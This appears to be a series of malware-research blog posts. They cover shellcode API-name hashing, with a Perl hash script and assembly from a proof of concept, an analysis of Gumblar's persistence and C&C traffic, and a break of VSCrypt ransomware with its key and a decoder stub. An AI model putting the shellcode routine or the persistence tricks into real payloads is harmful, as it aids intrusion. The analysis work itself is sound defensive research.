I occasionally spend time reverse engineering shellcode used in various attacks. And, someday, should you find yourself in a similar situation, the following information might be useful…

The Last Stage of Delerium research group, back in 2002, published a technique for doing Win32 API RVA lookups using only the hash of a string — the name of the API function — rather than storing, and performing a full compare on the very long string. (Which some shellcode still does anyway.)

In their paper, they proposed the use of a simple shift and add style integer hash. (Just like the ones taught in a CompSci 101 class.) I don't believe that this hash has a more proper name. In the paper, and accompanying [hard to find] PoC code, they used h=((h<<5)|(h>>27))+c to calculate the hash. (c being each letter of the string, and h the running total.)

Reference: (§2.1 Page 9)
(wasn't linked to on the site, hard to find) is down at the moment, let me know if you really need a copy of these files and can't find them elsewhere. ('Cause I found copies.)

For some reason — probably widespread code availability and copy pasta — this is the only hash algorithm ever used in any shellcode I've seen. Little things like this make it possible to construct a phylogenetic tree of shellcode evolution/authorship over time.


I got tired of asking, Wait, what was 0xEC0E4E8E again? So, I made up a table of every hash, for most of the common Win32 API functions. Hopefully this gets indexed by Google, as I have a habit of using that to search, rather then remembering where I left my list.

A Perl script to generate that table

#!/usr/bin/perl -w

use strict;

sub ror {

my $number = shift;

my $bitshift = shift;

return ($number >> $bitshift) | ($number << (32 - $bitshift));


sub hash {

my @name = unpack("C*",shift);

my $hash = 0;

for(my $i=0; $i<=$#name; $i++) {

$hash = ror($hash, 0xD) + $name[$i];


return $hash;


while(<>) {


printf ("%08x\t%s\n", hash($_),$_); #modify this line if you want SQL or HTML, &c.


Except from Last Stage of Delerium's PoC

This is the code that almost nobody ever saw, and is never used by malware.

xor eax,eax ; index

i3: mov esi,[4*eax+ebx] ; ptr to symbol name

add esi,edx ; rva2va

push ebx ; hash: h=((h<<5)|(h>>27))+c

push eax

xor ebx,ebx

i4: xor eax,eax ; hash loop


rol ebx,5

add ebx,eax

cmp eax,0

jnz i4

ror ebx,5

cmp ebx,ecx ; hash compare

pop eax

pop ebx

je i5 ; same: symbol found

inc eax

jmp i3 ; different: go to the next symbol

Or in actual bytes…

00000985 53 push ebx

00000986 50 push eax

00000987 33DB xor ebx,ebx ; hash loop

00000989 33C0 xor eax,eax

0000098B AC lodsb

0000098C C1C305 rol ebx,0x5

0000098F 03D8 add ebx,eax

00000991 83F800 cmp eax,byte +0x0

00000994 75F3 jnz 0x989

00000996 C1CB05 ror ebx,0x5

00000999 3BD9 cmp ebx,ecx ; hash compare

0000099B 58 pop eax

0000099C 5B pop ebx

0000099D 7403 jz 0x9a2

0000099F 40 inc eax

000009A0 EBDE jmp short 0x980

The Table (For Google's Sake)

This is just to make is easy to Google for any of these DWORDs. (As big and little endian, DWORDs and BYTEs in various formats.



Julia Wolf @ FireEye Malware Intelligence Lab


Questions/Comments to research [@] fireeye [.] com

Gumblar… Not Gumby!

Ok, I admit this blog post is not about our childhood TV friend, Gumby... Instead it's about a much more sinister character, Gumblar & its malware henchmen...

Originally making its debut back in March/April of this year (see here and here) and then suddenly it went quiet for a few months, until recently... Yes, Gumblar is back with a vengeance & still causing problems for it's unsuspecting victims.

The primary delivery mechanism is still via Drive-By-Download (notably compromised sites serving malicious Adobe PDF's) which when successful will load the malware onto your system.

We have taken a look at a couple of the Gumblar associated malware samples, you can see some VirusTotal results here & here.

Here is a quick peek at what this bad-guy is doing...
Once loaded on to the victim's system, it silently executes with out any obvious indications to the end-user. (no Fake AV pop-ups, instant reboots, tray icons or ransom notes here.)

The UPX packed executable will proceed to write out a file (disguised as an innocent temp or backup file) 1 subdirectory beneath it's current location.
The dropped file, actually a .dll (18432 bytes in size), uses (3-6 character) randomly generated filename with the extension ".tmp", ".bak", ".dat" or ".old".


filename extensions visible when looking at the binary in a hex editor.

It goes on to delete a couple audio drivers from the "c:\windows\system32\" directory (sysaudio.sys & wdmaud.sys).
Along with deleting these, it adds the following registry key:

"HKLM/Software/Microsoft/Windows NT/Current Version/Drivers32/midi9"

The above registry key value "midi9" actually equates to executing "<dropped_file> 0yAAAAAAAA" when loaded.
The system will now use the evil .dll file anytime the browser is loaded.

(Note the .bak file followed by the "0yAAAAAAAA" string, it's always there).

The malware will also generate an ID string (32 characters long) that gets sent to the C&C.



Sample screen shots of the malware's string generation routine.

The malware will also attempt to rename itself with no filename (null) upon reboot, using the MOVEFILE_DELAY_UNTIL_REBOOT function & a flag of 0x4.

A quick peek at the registry shows it created an entry under

HLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

Normally ok except in the value data there is only 1 entry when there should be a pair (the current file name & what to rename it to upon reboot). 

Once the infection process completes, it quietly waits for you to access a website site using your browser.
Here is where this guy really starts to go to work, stealing FTP credentials and potentially skewing search results. Anything your browser sees, IT sees...

A quick look at a running packet capture and we see that along with the normal HTTP traffic it has taken the opportunity to communicate with the C&C.
It has sent the 32 character string (prefixed with "?0E2" & followed by a "0" at the end) in the URI to the C&C & received back a response as displayed here:


Notice the "SS: " & "Xost: " fields in the HTTP Header.
The "SS:" field contains the URI you were accessing & the "Xost:" field holds the original destination host/site.
Also of note is the response from the server.
The "//fHqq0EDFBNEED" is always present followed by the 32 byte string that was sent to the C&C, and then 2 additional bytes (the "2y" at the end).
(If you see this type of traffic on your network, it's time to be a little concerned...)

The malware attempts to contact one of 3 IP's

1.) - still alive & well.

OrgName: Secured Private Network 
Address: 1740 East Garry Ave.
Address: Suite 234
City: Santa Ana
StateProv: CA
PostalCode: 92705
Country: US
NetRange: -
OriginAS: AS22298
NetName: SPN3W
NetHandle: NET-67-215-224-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-10-18
Updated: 2008-10-08

2.)  - known Crimeware friendly ISP as mentioned here.

OrgName: Netelligent Hosting Services Inc.
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA
NetRange: -
NetHandle: NET-67-212-64-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-08-30
Updated: 2008-06-20

3.) - which appears to host 9 other sites, including some leading to pages serving FakeAV.

inetnum: -
netname: ROOT-195-24-72-0-21
descr: root eSolutions
country: LU
admin-c: AB99-RIPE
tech-c: RE655-RIPE
mnt-by: ROOT-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
source: RIPE # Filtered

So while unsuspecting victims go about there usual web activity, the malware will quietly send data to any one of these 3 IP's (in the above order).

Without careful inspection, this communication can easily snake by perimeter defenses & security software.

More to come...

A special thanks to my colleagues Atif Mushtaq & Julia Wolf.

J.G. @ FireEye Malware Intelligence Lab

Detailed Question/Comments : research SHIFT-2 fireeye DOT COM


Cryptanalysis of VSCrypt Ransomware and the Control Sum Cript Algorithm v1.0


I was recently sent an email by someone who was hit with a new species of ransomware. This one encrypted all of the documents on the system, attached the extension .vscrypt to the end, and changed the desktop wallpaper to a ransom note written in Russian. Here are my findings…

MD5 Sum Filename Magic Number Packer Build Time
56e78abca7acad5165b7390eaa32ca67 56e78abca7acad5165b7390eaa32ca67 Possible trojan.scr Possible trojan.scr MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows not detected
(because I haven’t kept my database up to date)
not detected
(because I haven’t kept my database up to date)
Fri Jun 19 15:22:17 1992 Fri Jun 19 15:22:17 1992

…when executed, drops the following files onto the system: [It pretends to be an installer for Windows Media Player 9 (English).]

MD5 Sum Filename Magic Number Packer Build Time
7e5f5bea9600121a41dd4619abf70029 7e5f5bea9600121a41dd4619abf70029 /Program Files/Flash Media Arts,inc/SWF Video/23854356.avi /Program Files/Flash Media Arts,inc/SWF Video/23854356.avi MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows Microsoft Visual C++ v7.0 Microsoft Visual C++ v7.0 Tue Nov 20 16:59:32 2007 Tue Nov 20 16:59:32 2007
010d7b79d002d747f420a7880f89ee38 010d7b79d002d747f420a7880f89ee38 /Program Files/Flash Media Arts,inc/SWF Video/Free_update.exe /Program Files/Flash Media Arts,inc/SWF Video/Free_update.exe MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows Microsoft Visual Basic v5.0/v6. Microsoft Visual Basic v5.0/v6. Tue May 12 04:03:40 2009 Tue May 12 04:03:40 2009
aa74d413fcc98fef29ba9bd75f894093 aa74d413fcc98fef29ba9bd75f894093 /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.exe /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.exe MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows not detected, but packed anyway not detected, but packed anyway Fri Jun 19 15:22:17 1992 Fri Jun 19 15:22:17 1992
031fc32cd1b5bde5b1efa1d148815000 031fc32cd1b5bde5b1efa1d148815000 /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.ini /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.ini ISO-8859 text, with CRLF line terminators ISO-8859 text, with CRLF line terminators N/A N/A N/A N/A
d3583ac12d068e231c0b1e62c2a7eb49 d3583ac12d068e231c0b1e62c2a7eb49 /Program Files/Flash Media Arts,inc/SWF Video/Video_codec.exe /Program Files/Flash Media Arts,inc/SWF Video/Video_codec.exe MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows Microsoft Visual Basic v5.0/v6.0 Microsoft Visual Basic v5.0/v6.0 Tue May 12 04:03:40 2009 Tue May 12 04:03:40 2009
5f9927ee59b4881a2ce8634332f63fa8 5f9927ee59b4881a2ce8634332f63fa8 /Program Files/Flash Media Arts,inc/SWF Video/svchost.exe /Program Files/Flash Media Arts,inc/SWF Video/svchost.exe MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows Microsoft Visual Basic v5.0/v6.0 Microsoft Visual Basic v5.0/v6.0 Tue May 12 04:03:40 2009 Tue May 12 04:03:40 2009

It immediately executes Video_codec.exe and svchost.exe. svchost.exe and CSCA1.DLL were written in Delphi. These files all use the same packer written in Visual Basic 6 of all things. The packer uses Blowfish, and has a giant blob of a Base64 encoded EXE file embedded in it which it drops to disk, and then that

does something else, and blah blah blah, I got around it on the first try. Whomever compiled this packer, appears to have a German Locale, based upon paths like: C:\Programme\Microsoft Visual Studio\VB98\VB6.OLB (Free_update.exe is a keylogger by the way.) The VSCrypt ransomware is svchost.exe in this case. And these are the files it drops when executed:

MD5 Sum Filename Magic Number Packer Build Time
b817a4c8ca2479be0ea7e5dab1cb4432 b817a4c8ca2479be0ea7e5dab1cb4432 /vsworkdir/CSCA1.DLL /vsworkdir/CSCA1.DLL MS-DOS executable (EXE), OS/2 or MS Windows MS-DOS executable (EXE), OS/2 or MS Windows not detected
(because I haven’t kept my database up to date)
not detected
(because I haven’t kept my database up to date)
Fri Jun 19 15:22:17 1992 Fri Jun 19 15:22:17 1992
80e1d714045a4402e3992a195f7e7a08 80e1d714045a4402e3992a195f7e7a08 /vsworkdir/shantazh.jpg /vsworkdir/shantazh.jpg JPEG image data, JFIF standard 1.00, comment: “LEAD Technologies Inc. V1.01″ JPEG image data, JFIF standard 1.00, comment: “LEAD Technologies Inc. V1.01″ N/A N/A N/A N/A

So what does it do?

VSCrypt (svchost.exe) searches each directory on the system, for the following files:















For each file like this it finds, it encrypts it using the Control Sum Cript Algorithm v1.0 (CSCA1.DLL) with the password Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql, more on this below. Adds a .vscrypt to the end of the filename, and deletes the original. At the end of this process, it drops shantazh.jpg and sets [HKEY_CURRENT_USER\Control Panel\Desktop] ConvertedWallpaper = "C:\vsworkdir\shantazh.jpg" in the registry — setting the desktop background to the «шантаж» or blackmail note.

All your files are belong to us.

I went through the effort of typing this in while translating, so here is the text of the message in the shantazh.jpg file. I don't speak Russian very well, so please forgive me if I made any typos.

Привет я Trojan encoder точнее одна из его разновидностей ::) мой автор человек с ником КОРЕКТОР и он с удовольствием продаст вам дешифратор для тех файлов что я успел зашифровать на вашем компьютере за скромную сумму в 10 долларов это где то 350 рублей вот данные для свизи с моим хозяином

Mail: icq 481095

ах да чуть не забыл не стирайте файлы с расширением

vscrypt если сотрете вернуть зашифрованую информацию станет не возможно

Удачи искренне ваши Trojan encoder и КОРРЕКТОР

It basically says that either a person or a program named Trojan Encoder (I can't tell) has encrypted your files, and if you want to get them back, they're selling CORRECTOR for the affordable price of US$10 or about 350 Rubles. (Update: better translation here)

So here, I'll save you the US$10…

Control Sum Cript Algorithm v1.0

This is an additive stream cipher, which generates it's keystream by repeatedly taking the CRC32 sum of a shuffled string (the password). The shuffling algorithm takes the first byte of the password, and moves it to the end. Then for the next call, it takes the second byte of the password, and moves that to the end. And then the third byte, moved to the end. And so on, until it reaches the end of the string, then it goes back to the first byte and moves that to the end, and so on. Intuitively, if you shuffle a deck of cards this way, it'll eventually unshuffle itself (since you always swap with the same position). For a deck of 38 cards, or a password of 38 characters, the pattern will cycle after only 1110 shuffles. Making the password longer won't help, it's not linear; 50 characters will cycle after 735 shuffles, and 65 characters will cycle after 448 shuffles. (But if you want to try this experiment with a deck of 52 cards, It's going to take 32,844 card swaps to get the cards back into their original order.) So, basically the number of permutations before you cycle is this sequence: A051732 Number of interlacings (or shuffles) required to restore deck of n cards to original order times (n-1) (i.e. a(n)*(n-1)). (Thanks to Andrea for finding that for me.)

So, with a four byte CRC32 of this shuffled password, the keystream cycles every (1110*4)=4440 bytes.

Offset Generator CRC (keystream)
0 0 crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF") crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF") bc 2f 25 80 bc 2f 25 80
4 4 crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn") crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn") ae f8 53 e4 ae f8 53 e4
8 8 crc32("atzma1518061DgFgvFdvHyfvFdWwlm876QlFna") crc32("atzma1518061DgFgvFdvHyfvFdWwlm876QlFna") c3 0b 1d c9 c3 0b 1d c9
12 12 crc32("atza1518061DgFgvFdvHyfvFdWwlm876QlFnam") crc32("atza1518061DgFgvFdvHyfvFdWwlm876QlFnam") 68 9b 8f aa 68 9b 8f aa
20 20 crc32("atza518061DgFgvFdvHyfvFdWwlm876QlFnam1") crc32("atza518061DgFgvFdvHyfvFdWwlm876QlFnam1") d8 d4 a7 6a d8 d4 a7 6a
[...] [...] [...] [...] [...] [...]
4432 4432 crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876lQ") crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876lQ") 34 20 02 e1 34 20 02 e1
4436 4436 crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql") crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql") 9b 24 82 d3 9b 24 82 d3
4440 4440 crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF") crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF") bc 2f 25 80 bc 2f 25 80
4444 4444 crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn") crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn") ae f8 53 e4 ae f8 53 e4

You just XOR

bc 2f 25 80 ae f8 53 e4 c3 0b 1d c9 68 9b 8f


… with your data to encrypt or decrypt it. Here's a link to the full keystream if you're curious: Download vscrypt_keystream.bin Statistics about this keystream appear below.

<speculation>I believe that it's possible to recover the password, given only the keystream from this cipher. (Just hand the program you want to crack a file full of nulls to get the keystream.) You can easilly figure out the length of the password from the cycle length of the keystream. And CRC32 is very linear, you can reverse the function and get some of the original bits out. With a zillion CRC's for each permutation, and with knowledge of which eight bits of the key are being shuffled each time. It should be possible to just write a big linear equation to solve for the key, given only the keystream.</speculation>

Also, any repeated CRC32's in the stream, also indicate that there is a letter (octet) which appears at least twice. (When the two identical octets get moved to the end (positions (length) and (length-1), and it's permutation number (length - 1 - (offset MOD length)) then the two swap with themselves, giving the same CRC result. The password

Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql for example, the letter v does this.

Iteration Generator CRC (keystream)
328 328 crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmylvFv") crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmylvFv") 95 f4 fb ca 95 f4 fb ca
329 329 crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlvFvy") crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlvFvy") 6e 95 cd 36 6e 95 cd 36
330 330 crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFvyv") crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFvyv") 01 89 aa f5 01 89 aa f5
331 331 crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv") crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv") f3 d2 6e 79 f3 d2 6e 79
332 332 crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv") crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv") f3 d2 6e 79 f3 d2 6e 79
333 333 crc32("1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvvW") crc32("1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvvW") 6d ae 69 d4 6d ae 69 d4
[...] [...] [...] [...] [...] [...]
884 884 crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlvFvy") crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlvFvy") 92 1a 36 f9 92 1a 36 f9
885 885 crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFvyv") crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFvyv") fd 06 51 3a fd 06 51 3a
886 886 crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv") crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv") 0f 5d 95 b6 0f 5d 95 b6
887 887 crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv") crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv") 0f 5d 95 b6 0f 5d 95 b6
888 888 crc32("1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvvW") crc32("1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvvW") d5 eb ad 60 d5 eb ad 60

The letter v appears in the string Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql at positions 20, 23, and 27 (counting up from 1, this is math not computer science). So, there is some kind of mathamatical relationship between the numbers: 20, 23, 27, 38, 331, 332, 886, 887, and 1110. But I haven't figured out what it is yet.

So, yeah, even if you can't just rip the password out of the EXE, treating this cipher as a black-box, I believe that key recovery is possible with only knowledge of the keystream.


Disassembly/Source Code


In the first draft of this, I had a disassembly of most of the code out of C:\vsworkdir\CSCA1.DLL, with some commentary by me of what things were doing. But then I discovered the source code for CSCA1.DLL on the «Блог программистов» (Programmer's Blog), which is much more understandable than my marked up disassembly. Source Code: and this is the article that rpy3uH (the author) wrote about it: Шифровка с помощью пароля. Улучшаем алгоритм шифрования (Encoding with password. We improve the coding algorithm. [or something like that] I don't really speak Russian, so I wasn't sure at first if this was just an analysis of CSCA1.DLL by someone else, or the origin. It seems to refer to some earlier article about a cypher that's not as good at this one, but I can't quite figure out where that is.)


Proof of Concept



Anyway, I hacked together a vscrypt decoder in perl. It needs some work, but I spent less than an hour on this. I don't recommend that you use this at all, but if you're writing your own decoder, this is something to work from.


perl foo.txt.vscrypt foo.txt


perl inputfile outputfile




#!/usr/bin/perl -w

use lib qw( blib/lib lib );

use Archive::Zip;

use FileHandle;

use Fcntl;

exit(0); #Don't really use this script, it's a demo for other programmers.

my $infile = shift; #TODO: check for missing arguments.

my $outfile = shift;

my $inbuf;

my $outbuf;

sysopen(IN , $infile , O_RDONLY); binmode(IN );

sysopen(OUT, $outfile, O_WRONLY|O_CREAT); binmode(OUT);

my $key = "Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql";

# I'm sure there must be a more clever way to do this in Perl

sub permutate {

my $offset = shift;

my $key = shift;

$offset = $offset % (length($key)-1);

my $beginning = substr($key, 0, $offset);

my $middle = substr($key, $offset, 1);

my $end = substr($key, $offset+1);

$key = $beginning . $end . $middle;

return $key;



#for (my $i=0; $i < 60 ; $i++) {

# $key = permutate($i,$key);

# printf("%i\t%s\t%08x\n",$i,$key,Archive::Zip::computeCRC32($key,0));


my $offset = 0;

while (0!=sysread(IN, $inbuf, 4)) {

$key = permutate($offset++,$key);

#DEBUG printf("%08x\t%08x\n",unpack("V",$inbuf),Archive::Zip::computeCRC32($key,0));

$outbuf = unpack("V",$inbuf) ^ Archive::Zip::computeCRC32($key,0);

syswrite(OUT, pack("V",$outbuf), 4);


# TODO: Deal with last one, two, or three bytes.





There is also a free tool written and distributed by Dr. Web:

I can't endorse it, but I'm sure that it works better than my Perl script



What about .encrypt files?



That's something completely different. That's GPCode and I'm going to write something up on it soonish. If you suddenly found yourself in the situation where all of your documents are encrypted with .encrypt at the end of the filename. Stop using the machine immediately, yank the plug if you have to. Your files still exist in the newly created empty space of the filesystem. You can undelete your files if you don't overwrite them first. If you catch this early enough, I think it is also possible to dump the memory from the system, and pull the encryption key out of it. (I haven't tested this yet.) If you don't know how to do a memory dump of your system, you're better off just pulling the plug and going the undelete route. Oh and if you are hit by this, and you do undelete the malware that did this, please send me a sample. <julia→>


You can stop reading now



This is all of the entropy that is really in vscrypt…

echo -n Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql | stan




General statistics for the stream, bytes 38

Arithmetic mean: 86.473684 ~ 0x56(V)

Median: 97.000000 ~ 0x61(a)

Deviation: 25.538142

Chi-Square test: 464.269556

Entropy per byte: 4.346226

Correlation co.: 0.442653

Pattern length 1, different 23, total 38, bytes 38, depth 6

- Pattern range

0x30(0): 0x00000001 - 0x7a(z): 0x00000001

- 10 most used patterns

0x46(F): 0x00000004 0x31(1): 0x00000003 0x61(a): 0x00000003

0x76(v): 0x00000003 0x38(8): 0x00000002 0x36(6): 0x00000002

0x67(g): 0x00000002 0x64(d): 0x00000002 0x6d(m): 0x00000002

0x6c(l): 0x00000002

Pattern length 2, different 35, total 37, bytes 38, depth 9

- Pattern range

0x3036(06): 0x00000001 - 0x7a6d(zm): 0x00000001

- 10 most used patterns

0x7646(vF): 0x00000002 0x4664(Fd): 0x00000002 0x4661(Fa): 0x00000001

0x3135(15): 0x00000001 0x3036(06): 0x00000001 0x3531(51): 0x00000001

0x3138(18): 0x00000001 0x3144(1D): 0x00000001 0x3830(80): 0x00000001

0x3631(61): 0x00000001




And these are the stats for the whole generated keystream. Notice that 0xf3d26e79 and 0x0f5d95b6 appear twice in the stream. See the stuff above about the letter v.

stan -p 4 vscrypt_keystream.bin




General statistics for the stream, bytes 4440

Arithmetic mean: 128.209685

Median: 129.000000

Deviation: 73.703444 ~ 0x49(I)

Chi-Square test: 276.303657

Entropy per byte: 7.953987

Correlation co.: -0.029830

Pattern length 1, different 256, total 4440, bytes 4440, depth 16

- Pattern range

0x00( ): 0x00000019 - 0xff( ): 0x00000013

- 10 most used patterns

0x2f(/): 0x0000001e 0x10( ): 0x0000001d 0x48(H): 0x0000001d

0x1b( ): 0x0000001b 0x12( ): 0x0000001b 0xe0( ): 0x0000001b

0xfb( ): 0x0000001a 0x00( ): 0x00000019 0x94( ): 0x00000019

0x60(`): 0x00000019

Pattern length 2, different 4285, total 4439, bytes 4440, depth 28

- Pattern range

0x0005( ): 0x00000001 - 0xfff6( ): 0x00000001

- 10 most used patterns

0x00cd( ): 0x00000003 0x948b( ): 0x00000003 0x20bb( ): 0x00000002

0x0be4( ): 0x00000002 0x0921( !): 0x00000002 0x04f8( ): 0x00000002

0x01c2( ): 0x00000002 0x08a7( ): 0x00000002 0x07f0( ): 0x00000002

0x1dc9( ): 0x00000002

Pattern length 3, different 4432, total 4438, bytes 4440, depth 31

- Pattern range

0x000592( ): 0x00000001 - 0xfff609( ): 0x00000001

- 10 most used patterns

0xf3d26e( n): 0x00000002 0xd26e79( ny): 0x00000002

0x4d7fc2(M ): 0x00000002 0x00cdc5( ): 0x00000002

0x0f5d95( ] ): 0x00000002 0x5d95b6(] ): 0x00000002

0x00c1b1( ): 0x00000001 0x006fe1( o ): 0x00000001

0x001b3e( >): 0x00000001 0x000592( ): 0x00000001

Pattern length 4, different 4435, total 4437, bytes 4440, depth 30

- Pattern range

0x0005921a( ): 0x00000001 - 0xfff60921( !): 0x00000001

- 10 most used patterns

0xf3d26e79( ny): 0x00000002 0x0f5d95b6( ] ): 0x00000002

0x0b1dc968( h): 0x00000001 0x094b425f( KB_): 0x00000001

0x01603ee9( `> ): 0x00000001 0x00cdece4( ): 0x00000001

0x00c1b1f0( ): 0x00000001 0x006fe10f( o ): 0x00000001

0x001b3e2b( >+): 0x00000001 0x0005921a( ): 0x00000001

Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com

Upcoming Jan & Feb Events Where We Are Presenting Research

We're sharing our research at the upcoming ISOI6, the US Dept of Defense Cyber Crime conference, Internet2 Joint Techs, and at ShmooCon. If you are attending any of those events, we'd love to meet you in person!  Alex talks about McColo, I'll be discussing Web malware in government networks, Stu covers the latest in malware obfusction tactics, and Julia dives into the Srizbi botnet takedown.  For Dates, times, topics, & locations, please read on.

A few more details for those in the area / attending:

Internet Security Operations and Intelligence (ISOI) 6

Jan. 29 in Dallas, TX

Alex speaks on the topic of McColo on Jan 29 at 15:30.  He'll discuss our efforts in working with coordinating bodies of the Internet and the press to facilitate the disconnection of McColo from the Internet. He'll also discuss how McColo (and botnet C&Cs hosted there!) re-connected to the Internet and what the bot herders may have done during that brief time.

U.S. Department of Defense (DoD) Cyber Crime

Conference 2009

Jan. 30 in St. Louis, MO

I'll be speaking on the topic, "Web Malware: Combating the New Keys to the Kingdom."  My session is this Friday, Jan 30 from 11:00 to 11:50 a.m. as part of the Information Assurance Track. I'll cover the threat and how today's countermeasures have been largely ineffective in preventing both the initial Web malware intrusions and the subsequent call backs to C&C infrastructures. I'll also examine the malware infection cycle and discuss how government agencies can take preventative measures.

Internet2 Joint Techs

Feb. 4 in College Station, TX

Stu's speaking on the topic, "Web Malware Tech: Obfuscation and other Evasion Techniques". His session is next Wed, Feb 4 from 8:50am till 9:10am where he talks about the increasing criminal sophistication of Web malware. He covers how a deadly cocktail of threats such as phishing spam containing URLs that load Web pages laced with obfuscated code has made almost all security technologies obsolete. For example, pretty much all serious Web malware infections use obfuscation as a way to infiltrate via port 80.

ShmooCon 2009

Feb. 6 in Washington, DC

Julia's session (The Srizbi Botnet Takedown) is during the Main Track day on Feb 6 at 17:00.  Julia covers how FireEye was able to hijack the Srizbi botnet, which was responsible for about 75% of all of the spam worldwide.

Hope to see a few of you there!

On the new Explorer XML zero day

See update below!

Shadowserver is reporting   on websites serving up a new zero day Internet Explorer exploit involving XML (see also SecurityFocus  and an initial so-far-sketchy  Microsoft advisory ).  For the sake of our customers (and potential customers!) I wanted to tentatively report that a) indeed this appears to be a real factor in the wild by now, and b) the FireEye product does appear to be correctly detecting it in at least one case.  I checked around a few boxes I have access to and found a VM verified web infection event which was initiated from the web server   (That IP address should be assumed to be armed and dangerous).  Our statistical anomaly algorithms picked up on the following piece of javascript (this is a screenshot so should be harmless unless you retype it:)

Picture 289
I haven't seen this <object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"> in malicious Javascript recently enough that I can recall it off the top of my head - and some grepping on the boxes I checked found only this one event like this in the last month.  " 88d969c5-f192-11d4-a65f-0040963251e5" turns out to be the class ID for the ActiveX control that implements  XMLHTTP within Microsoft XML Core Services so it seems likely that this is an instance of the new exploit (though I haven't verified that yet) .  There was a vulnerability in this component back in 2006 (eg see the Securiteam advisory from that time).  If so, it's at least possible that the instructions at that link for disabling that component would also be protective here.  That would be less impactful than not browsing with IE 7.  (Again, I stress that I haven't confirmed that speculation - I'm throwing out the possibility in case it's helpful to others in the community).
More tomorrow hopefully.
It turned out when we investigated this in detail that it's not related to the XML zero-day vulnerability.  We've now seen four of these events at various customers with the same starting <object> tag with the same classid.  We haven't seen that particular form before, and Google does not find other discussions of it.  The obfuscated body is polymorphic but when deobfuscated reveals a bunch of older browser/plugin exploits.  One of the incidents succeeded in infecting the client, and on investigation, that turned out to be this fresh packing of the Grum bot.  The destination IP of the exploit server was the same in all cases, and it's a known RBN IP address.  The campaign appears to be driven by malicious ads.  Thanks to Julia, Atif, and Alex for help in investigating, and apologies for any confusion: it appears to be a new obfuscation idiom and a new packing that was not recognized by almost any AV, but not a new exploit - just coincidence that the XMLHTTP classid was used on the same day that the new XML exploit was out.